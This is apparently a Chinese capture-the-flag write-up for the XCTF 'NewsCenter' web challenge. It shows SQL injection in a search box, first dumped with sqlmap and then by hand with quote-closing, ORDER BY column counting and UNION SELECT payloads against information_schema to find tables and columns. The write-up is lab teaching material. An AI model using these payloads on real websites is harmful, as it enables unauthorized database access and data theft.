攻防世界web进阶区NewsCenter详解
题目
我们输入搜索,很明显是一个注入
方法一sqlmap注入
抓到包之后,存到txt文件中,
-r获取文件
然后发现可以注入
接着我们–dump直接获取到flag(比较暴力)
方法二手工注入
前引号为了闭合之前的语句,后面的#为了注释后面的引号
否则都会报错
我们使用orderby 查询有几列
当我们写三时发现可以正常查询,4就不行了
发现有一些前缀的文章,那么我们使用一些垃圾话将他查询失效
2和三可以回显
database数据库为news
我们查询他的表
woaini' union select 1,group_concat(table_name),database() from information_schema.tables where table_schema='news'#
我们查询他的列
woaini' union select 1,group_concat(column_name),database() from information_schema.columns where table_name='secret_table'#
我们查询fl4g字段